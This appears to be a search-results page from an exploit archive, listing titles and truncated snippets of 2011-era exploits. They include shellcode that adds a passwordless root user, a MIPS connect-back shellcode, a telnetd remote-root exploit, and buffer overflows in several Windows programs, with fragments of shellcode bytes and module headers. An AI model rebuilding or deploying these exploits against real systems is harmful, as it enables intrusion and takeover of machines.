7260 matches found
linux/x86 shellcode - setuid(0)+setgid(0)+add user iph without password - 124 bytes
/ Exploit Title: Linux/x86 Polymorphic ShellCode - setuid0+setgid0+add user 'iph' without password to /etc/passwd setuid - setgid - open - write - close - exit Date: 30/12/2011 Author: pentesters.ir Tested on: Linux x86 - CentOS 6.0 - 2.6.32-71 Website: http://pentesters.ir/ Contact:...
TelnetD encrypt_keyid - Function Pointer Overwrite
TelnetD encrypt_keyid - Function Pointer Overwrite / telnetd-encryptkeyid.c Mon Dec 26 20:37:05 CET 2011 Copyright 2011 Jaime Penalba Estebanez NighterMan Copyright 2011 Gonzalo J. Carracedo BatchDrake ...
Telnetd encrypt_keyid: Remote Root function pointer overwrite
Exploit for linux platform in category remote exploits / telnetd-encryptkeyid.c Mon Dec 26 20:37:05 CET 2011 Copyright 2011 Jaime Penalba Estebanez NighterMan Credits to batchdrake as always ...
TelnetD encrypt_keyid - Function Pointer Overwrite
/ telnetd-encryptkeyid.c Mon Dec 26 20:37:05 CET 2011 Copyright 2011 Jaime Penalba Estebanez NighterMan Copyright 2011 Gonzalo J. Carracedo BatchDrake ...
TORCS 1.3.1 Buffer Overflow
/ Exploit Title: TORCS acc Buffer Overflow Date: 20/12/2011 Author: Andres Gomez Software Link: http://torcs.sourceforge.net/ Version: torcs 1.3.1 Tested on: Windows CVE : / / This exploit generates a corrupted acc file which has to be saved in the directories where TORCS loads its data, for...
TORCS 1.3.1 - acc Buffer Overflow
TORCS 1.3.1 - acc Buffer Overflow / Exploit Title: TORCS acc Buffer Overflow Date: 20/12/2011 Author: Andres Gomez Software Link: http://torcs.sourceforge.net/ Version: torcs 1.3.1 Tested on: Windows CVE : / / This exploit generates a corrupted acc file which has to be saved in the directories...
TORCS 1.3.1 acc Buffer Overflow
Exploit for windows platform in category local exploits / Exploit Title: TORCS acc Buffer Overflow Date: 20/12/2011 Author: Andres Gomez Software Link: http://torcs.sourceforge.net/ Version: torcs 1.3.1 Tested on: Windows CVE : / / This exploit generates a corrupted acc file which has to be saved...
TORCS 1.3.1 - acc Buffer Overflow
/ Exploit Title: TORCS acc Buffer Overflow Date: 20/12/2011 Author: Andres Gomez Software Link: http://torcs.sourceforge.net/ Version: torcs 1.3.1 Tested on: Windows CVE : / / This exploit generates a corrupted acc file which has to be saved in the directories where TORCS loads its data, for...
Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes
Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Shellcode exploit for linux_mips platform / Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor...
linux/mips - connect back shellcode (port 0x7a69) - 168 bytes
/ Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor a0,t7,zero "\x01\xe0\x28\x27" // nor a1,t7,zero "\x28\x06\xff\xff" // slti a2,zero,-1 "\x24\x02\x10\x57" //...
YourPersonalWebServer
YOPS Your Own Personal WEB Server is a small SEDA-like HTTP ToDo: Add Reverse ToDo: Test Vulnerable Targets Exploit Pack - Hawk Eye Edition 3.3 Copyright 2014 Juan Sacco http://exploitpack.com This program is free software: you can redistribute it and/or modify it under the terms of the GNU Gener...
Web Servers UDP Flooding Denial of Service (CVE-2011-2013)
A denial of service vulnerability has been reported in all web servers. The vulnerability is due to the server's inability to handle multiple incoming UDP requests within a short period of time. Remote attackers may exploit this issue by rapidly sending a large number of UDP requests to the serve...
NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]
Exploit for windows platform in category dos / poc Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow ASLR Bypass Date: 02/12/11 Author: Zune - Julian Pulido Software Link: http://www.njstar.com/download/njcom.exe Version: 3.0 Build: 11818 and previous Tested on: Windows 7 Ultimate...
linux/x86-64 execve/bin/sh 52 bytes
linux/x86-64 execve/bin/sh 52 bytes. Shellcode exploit for lin_x86-64 platform / Exploit Title : linux/x86-64 execve/bin/sh 52 bytes Tested on : Linux iron 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux Date : 03/12/2011 Author : X-h4ck Email :...
NJStar Communicator 3.0 MiniSmtp Buffer Overflow
Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow ASLR Bypass Date: 02/12/11 Author: Zune - Julian Pulido Software Link: http://www.njstar.com/download/njcom.exe Version: 3.0 Build: 11818 and previous Tested on: Windows 7 Ultimate CVE:2011-4040 ! /usr/local/bin/python import socket...
SAP-Server-MaxDB
SAP Server 7.7.06.09 is vulnerable to a remote buffer overflow attack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP MaxDB. Authentication is not required to exploit this vulnerability. The specific flaw exists within the serv.exe process...
CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit (.m3u)
No description provided by source. Exploit: CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit .m3u Date: 30 Nov 2011 Author: Rh0 Software: CCMPlayer 1.5 Tested on: Windows XP SP3 32-Bit EN VirtualBox require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = NormalRanking include...
CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)
Exploit: CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit .m3u Date: 30 Nov 2011 Author: Rh0 Software: CCMPlayer 1.5 Tested on: Windows XP SP3 32-Bit EN VirtualBox require 'msf/core' class Metasploit3 'CCMPlayer 1.5 Stack based Buffer Overflow .m3u', 'Description' = %q This module exploits a...
linux/mips XOR Shellcode Encoder (60 Bytes)
include include include include include include include define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten with the byte its xored with 0. gcc encoder.c -o encoder 1. perl -e 'print "\xsh\xel\xlc\xod\xe0";'...
Wireshark 1.4.4 DECT Dissector Buffer Overflow
!/usr/bin/env python -- coding: iso-8859-15 -- a = """ \n\t-- CVE: 2011-1591 : Wireshark = 2.5 For any comments, remarks, news, please mail me : ipv at team . net \n""" import sys, struct if sys.versioninfo = 2, 5: from scapy.all import else: from scapy import align def xv: return struct.pack"I",...